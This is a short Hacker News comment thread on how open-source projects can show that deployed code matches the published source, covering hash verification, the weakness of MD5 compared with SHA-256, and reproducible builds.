Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

> what guarantee do we have that the source code matches the deployed code?

What is the answer to this question in general? Genuinely asking, I never considered this but it seems like a real concern for any OSS.



For an app that exists solely on the client it’s easy to provide a md5 hash that can be verified.

This was and still is a popular solution if you torrent to make sure you’re getting what the original seeder intended. The same philosophy applies here.

For back end apps it’s inherently not possible.


Please do not use md5 in 2021. At least use something like sha256.


Agreed, it was broken a while ago.


Yeah I wondered this myself and my colleagues at the day job and myself were kinda stumped. How does any OSS prove that the repo linked is what is actually deployed?


I don't know that there is an answer, but I'd think the FAQ should at least mention the concern.


Fair - I will add this.


https://reproducible-builds.org/




Consider applying for YC's Summer 2026 batch! Applications are open till May 4

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: